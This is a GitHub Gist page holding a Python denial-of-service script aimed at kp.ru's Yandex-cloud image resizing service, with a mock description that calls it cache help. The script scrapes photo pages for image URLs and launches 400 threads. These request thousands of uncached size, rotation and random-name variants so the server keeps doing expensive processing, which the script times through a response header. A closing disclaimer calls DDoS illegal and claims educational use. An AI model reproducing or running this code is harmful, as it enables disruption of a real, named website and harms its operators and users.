Last active
March 16, 2022 10:39
-
-
Save AChep/13f2503bbed356f0dafca8a13aaa5bd0 to your computer and use it in GitHub Desktop.
Helps kp.ru/yandex cloud image generation service to cache images
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from bs4 import BeautifulSoup | |
import re | |
import threading | |
import requests | |
import random | |
import string | |
import time | |
headers = { | |
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36', | |
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', | |
'Stop-War': 'true', | |
} | |
def get_image_urls(): | |
image_url_pattern = re.compile(r'\/wr-\d{1,}\.\w{1,}$') | |
while 1: | |
image_section_id = random.randint(1, 79108) | |
# load next image section | |
image_section_url = "https://www.kp.ru/photo/%d/" % image_section_id | |
try: | |
image_section_html = requests.get( | |
image_section_url, headers=headers).text | |
except requests.exceptions.RequestException as e: | |
continue | |
# find all of the image link in this page and | |
# store it for later use | |
image_section_soup = BeautifulSoup(image_section_html, 'html.parser') | |
# iterate over re-scalable images | |
for image_url in [str(img.get('data-content-src')) for img in image_section_soup.find_all('div')]: | |
if image_url_pattern.search(image_url) == None: | |
continue | |
yield image_url | |
def fetch_image_url(url): | |
r_start_time = time.time() | |
try: | |
r = requests.get(url, headers=headers, stream=True) | |
except requests.exceptions.RequestException as e: | |
return None | |
r_end_time = time.time() | |
r_dt = r_end_time - r_start_time | |
# Count how much time was wasted by the | |
# server to process the image. | |
wasted_time = 0 | |
try: | |
wasted_time = float( | |
r.headers['x-envoy-upstream-service-time']) / 1000.0 | |
except Exception as e: | |
pass | |
return (r_dt, wasted_time, r.status_code) | |
def attack_image_url(url): | |
def get_image_width(prefix): | |
return [ | |
# common sizes | |
("common_%s-width" % prefix, ['%s-80' % prefix]), | |
("common_%s-width" % prefix, ['%s-100' % prefix]), | |
("common_%s-width" % prefix, ['%s-136' % prefix]), | |
("common_%s-width" % prefix, ['%s-200' % prefix]), | |
("common_%s-width" % prefix, ['%s-360' % prefix]), | |
("common_%s-width" % prefix, ['%s-420' % prefix]), | |
("common_%s-width" % prefix, ['%s-750' % prefix]), | |
("common_%s-width" % prefix, ['%s-767' % prefix]), | |
("common_%s-width" % prefix, ['%s-800' % prefix]), | |
("common_%s-width" % prefix, ['%s-960' % prefix]), | |
("common_%s-width" % prefix, ['%s-1280' % prefix]), | |
# random sizes | |
("random_%s-width" % prefix, [ | |
'%s-%d' % (prefix, 1281 + i) for i in range(1000) | |
]) | |
] | |
def get_image_height(prefix): | |
return [ | |
# common sizes | |
("common_%s-height" % prefix, ['%s-100' % prefix]), | |
("common_%s-height" % prefix, ['%s-360' % prefix]), | |
("common_%s-height" % prefix, ['%s-960' % prefix]), | |
("common_%s-height" % prefix, ['%s-1280' % prefix]), | |
# random sizes | |
("random_%s-height" % prefix, [ | |
'%s-%d' % (prefix, 1281 + i) for i in range(1000) | |
]) | |
] | |
# All of the image formats that are supported by the | |
# server. | |
formats = [ | |
'png', | |
'jpg', | |
'webp', | |
] | |
name_groups = [] | |
name_groups.extend(get_image_width("wr")) | |
name_groups.extend(get_image_width("w")) | |
name_groups.extend(get_image_height("hr")) | |
name_groups.extend([ | |
# common rotations | |
("common_rot", [ | |
'ro', | |
'ro-90', | |
'ro-270', | |
'ro-180' | |
]), | |
# all rotations | |
("random_rot", ['ro-%d' % (1 + i) for i in range(1080)]), | |
# random names | |
("random_names", [ | |
''.join( | |
random.choices(string.ascii_uppercase + string.digits, k=10) | |
) for i in range(1000) | |
]), | |
]) | |
for format in formats: | |
for group, names in name_groups: | |
for name in names: | |
file = name + "." + format | |
target_url = requests.compat.urljoin(url, file) | |
# request the given image | |
r = fetch_image_url(target_url) | |
if r is None or r[2] == 404: | |
print('Got 404 for "%s".' % | |
(target_url)) | |
break | |
print('Got %d for "%s" in %ds., wasted %fs.' % | |
(r[2], target_url, r[0], r[1])) | |
if r[1] < 0.1 and r[2] == 200: # wasted less than 0.1s | |
break | |
return None | |
image_urls = [] | |
def produce_image_urls(): | |
for url in get_image_urls(): | |
while len(image_urls) > 300: | |
time.sleep(0.1) | |
image_urls.append(url) | |
def consume_image_urls(): | |
while 1: | |
while len(image_urls): | |
try: | |
url = image_urls.pop() | |
except IndexError as e: | |
continue | |
attack_image_url(url) | |
time.sleep(0.1) | |
for _ in range(1): | |
t = threading.Thread(target=produce_image_urls, args=[]) | |
t.start() | |
for _ in range(400): | |
t = threading.Thread(target=consume_image_urls, args=[]) | |
t.start() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
DISCLAIMER: (D)DOS'ing is illegal! Usage of this script is intended for educational and testing purposes only!